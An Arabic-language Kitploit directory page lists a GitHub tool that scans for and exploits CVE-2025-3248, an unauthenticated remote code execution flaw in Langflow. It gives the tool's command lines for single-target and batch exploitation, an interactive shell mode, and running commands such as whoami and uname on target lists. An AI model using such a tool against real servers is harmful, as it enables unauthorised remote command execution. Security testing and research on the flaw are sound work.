Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-3248 — Langflow، عند تحليل "رمز التحقق" المُقدَّم من المستخدم عبر AST وتجميعه، يستدعي دالتي Python `compile()`/`exec()` دون إجراء مصادقة أو فرض قيود صندوق الحماية (كما يتم تقييم الوسائط الافتراضية للدوال والمُزيِّنات أثناء مرحلة التجميع)، مما يسمح للمهاجم بوضع حمولة خبيثة في القيم الافتراضية للوسائط أو في المُزيِّنات، وبالتالي تنفيذ تعليمات برمجية عشوائية في سياق الخادم (مثل فتح قشرة عكسية، تنزيل ملفات، أو التحرك الجانبي). | Kitploit
أدوات/GitHubGitHub/bambooqj/cve-2025-3248
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubbambooqj/cve-2025-3248

cve-2025-3248

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

Langflow، عند تحليل "رمز التحقق" المُقدَّم من المستخدم عبر AST وتجميعه، يستدعي دالتي Python `compile()`/`exec()` دون إجراء مصادقة أو فرض قيود صندوق الحماية (كما يتم تقييم الوسائط الافتراضية للدوال والمُزيِّنات أثناء مرحلة التجميع)، مما يسمح للمهاجم بوضع حمولة خبيثة في القيم الافتراضية للوسائط أو في المُزيِّنات، وبالتالي تنفيذ تعليمات برمجية عشوائية في سياق الخادم (مثل فتح قشرة عكسية، تنزيل ملفات، أو التحرك الجانبي).

مشاركة

CVE-2025-3248 Langflow RCE Scanner

أداة Python لفحص واستغلال ثغرة CVE-2025-3248، والتي تسمح بتنفيذ الأوامر عن بُعد (RCE) في تطبيقات Langflow.

الميزات

  • فحص هدف واحد وتنفيذ الأوامر
  • فحص دفعات من عناوين URL
  • وضع shell تفاعلي
  • معالجة متعددة الخيوط للدفعات
  • مخرجات مفصّلة ومعالجة الأخطاء
  • حفظ النتائج في ملف

تثبيت المتطلبات

root@kitploit:~
pip install requests

طريقة الاستخدام

فحص هدف واحد (الدخول إلى shell تفاعلي)

root@kitploit:~
python cve-2025-3248.py http://target:port

تنفيذ أمر على هدف واحد

root@kitploit:~
python cve-2025-3248.py http://target:port -c "id"

فحص دفعات

root@kitploit:~
python cve-2025-3248.py -f urls.txt

تنفيذ أوامر على دفعات

root@kitploit:~
python cve-2025-3248.py -f urls.txt -c "whoami"

خيارات متقدمة

root@kitploit:~
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v

شرح المعاملات

  • url: عنوان URL الهدف (مثال: http://10.10.10.1:7860)
  • -f, --file: ملف يحتوي على قائمة عناوين URL، عنوان واحد في كل سطر
  • -c, --cmd: الأمر المراد تنفيذه (مثال: id, whoami)
  • --timeout: مهلة الطلب، الافتراضي 10 ثوانٍ
  • -t, --threads: عدد الخيوط للفحص الجماعي، الافتراضي 10
  • -v, --verbose: الوضع التفصيلي، يعرض الاستجابة الخام

أمثلة

مثال 1: فحص هدف واحد

root@kitploit:~
python cve-2025-3248.py http://192.168.1.100:7860

مثال 2: تنفيذ أمر محدد

root@kitploit:~
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"

مثال 3: فحص دفعات من الأهداف

أنشئ ملف targets.txt:

root@kitploit:~
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860

ثم شغّل:

root@kitploit:~
python cve-2025-3248.py -f targets.txt

مثال 4: تنفيذ أوامر على دفعات

root@kitploit:~
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5

شرح المخرجات

  • [+] تنفيذ ناجح
  • [-] فشل أو خطأ
  • [!] رسالة تحذير
  • [*] مخرجات معلوماتية

ملف النتائج

يتم حفظ الأهداف التي تم فحصها بنجاح في ملف vulnerable_targets.txt أو vulnerable_targets_{command}.txt.

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. يتحمل المستخدم مسؤولية استخدامه. قد يؤدي اختبار الأنظمة دون إذن إلى انتهاك القوانين واللوائح.

المؤلف

  • bambooqj
  • GitHub: github.com/bambooqj

المراجع

  • CVE-2025-3248
  • التنفيذ المرجعي: ynsmroztas/CVE-2025-3248-Langflow-RCE
تنزيل الأداة